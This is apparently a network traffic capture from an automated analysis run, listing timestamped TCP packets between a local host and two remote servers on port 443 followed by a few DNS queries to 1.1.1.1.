                                                                                                                                                                        Nov 21, 2024 10:39:13.356676102 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.356735945 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.356846094 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.356868029 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.356888056 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.356949091 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.357234001 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.357249975 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.357259989 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.357265949 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.360894918 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.360934019 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.361006975 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.361172915 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.361188889 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.528945923 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.529474974 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.529494047 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.529927969 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.529932022 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.658730030 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.658787966 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.658843040 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.658950090 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.658989906 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.659018040 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.659046888 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.827975035 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.828085899 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.828108072 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.828152895 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.828174114 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.828202009 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.828212023 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.830842972 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.830873966 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.831085920 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.831085920 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.831110954 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.982738018 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.982758045 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.982897043 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.982918978 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.983175993 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.983181953 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.983197927 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.983366966 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.983396053 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.983450890 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.986040115 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.986090899 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.986186981 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.986323118 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.986341000 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.116621971 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.117418051 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.117475033 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.117888927 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.117902040 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.612371922 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.612459898 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.612505913 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.612535954 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.612631083 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.612682104 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.612682104 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.787429094 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.787480116 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.787554979 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.787592888 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.787616014 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.787619114 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.787648916 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.787682056 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.787807941 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.787828922 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.787842035 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.787848949 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.790488005 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.790522099 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.790591955 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.790734053 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.790747881 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.903923988 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.904402971 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.904418945 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:14.904880047 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:14.904885054 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.213485956 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.214168072 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.214185953 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.215003014 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.215008974 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.353902102 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.353925943 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.354100943 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.354118109 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.354216099 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.354341030 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.354341030 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.354347944 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.354535103 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.354566097 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.354629993 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.356877089 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.356987000 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.357076883 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.357218027 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.357254028 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.644345045 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.644926071 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.644939899 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.645505905 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.645510912 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.671071053 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.671097994 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.671173096 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.671191931 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.671471119 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.671478033 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.671489954 CET50088443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.671518087 CET4435008813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.674247980 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.674299955 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.674393892 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.674556017 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.674563885 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.772351980 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.776971102 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.776990891 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:15.777437925 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:15.777446985 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.089823961 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.092758894 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.092895031 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.092895031 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.093508959 CET50089443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.093530893 CET4435008913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.096975088 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.097018003 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.097084045 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.097363949 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.097374916 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.217891932 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.217948914 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.217998028 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.218264103 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.218276978 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.218287945 CET50090443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.218292952 CET4435009013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.221419096 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.221472979 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.221574068 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.221692085 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.221702099 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.329941988 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:16.329946995 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:16.329977036 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.329984903 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.330044985 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:16.330080032 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:16.330992937 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:16.331003904 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.331016064 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:16.331024885 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.572208881 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.572849035 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.572868109 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:16.573298931 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:16.573303938 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.016186953 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.019469023 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.019527912 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.019597054 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.019613028 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.019622087 CET50091443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.019629955 CET4435009113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.022382975 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.022406101 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.022470951 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.022602081 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.022613049 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.089771986 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.090400934 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.090495110 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.090848923 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.090863943 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.466691017 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.467236996 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.467300892 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.467675924 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.467691898 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.532663107 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.536210060 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.536286116 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.536577940 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.536596060 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.536621094 CET50092443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.536626101 CET4435009213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.540741920 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.540771961 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.540864944 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.540986061 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.540997028 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.911025047 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.914835930 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.914884090 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.914937973 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.915014982 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.915014982 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.915060043 CET50093443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.915098906 CET4435009313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.943814993 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.944375992 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.944389105 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:17.944880009 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:17.944885015 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.069947004 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.070672989 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.070719957 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.071274996 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.071286917 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.120229959 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.120340109 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.122221947 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.122232914 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.122524977 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.124120951 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.124193907 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.124207020 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.124358892 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.167335033 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.202408075 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.202923059 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.204981089 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.204988003 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.205297947 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.206938028 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.207071066 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.207073927 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.207463980 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.251321077 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.399359941 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.402544975 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.402622938 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.402666092 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.402683973 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.402698040 CET50094443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.402702093 CET4435009413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.513993025 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.514142036 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.514218092 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.514974117 CET50097443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.514998913 CET4435009740.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.523233891 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.526411057 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.526586056 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.526587009 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.526587009 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.615937948 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.616015911 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.616076946 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.616341114 CET50096443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:39:18.616357088 CET4435009640.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.821223974 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.821736097 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.821751118 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.822312117 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.822318077 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:18.827975035 CET50095443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:18.828011036 CET4435009513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.269531012 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.272516966 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.272562027 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.272659063 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.272677898 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.272689104 CET50098443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.272696018 CET4435009813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.318509102 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.319426060 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.319443941 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.319931984 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.319936991 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.765544891 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.765605927 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.765721083 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.765932083 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.765939951 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:19.765952110 CET50099443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:19.765957117 CET4435009913.107.246.60192.168.2.6
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Nov 21, 2024 10:37:19.039633036 CET6417253192.168.2.61.1.1.1
                                                                                                                                                                        Nov 21, 2024 10:37:19.299619913 CET53641721.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.622533083 CET53576511.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:56.701674938 CET53526191.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:58.967499018 CET53524501.1.1.1192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:00.843616962 CET5537153192.168.2.61.1.1.1
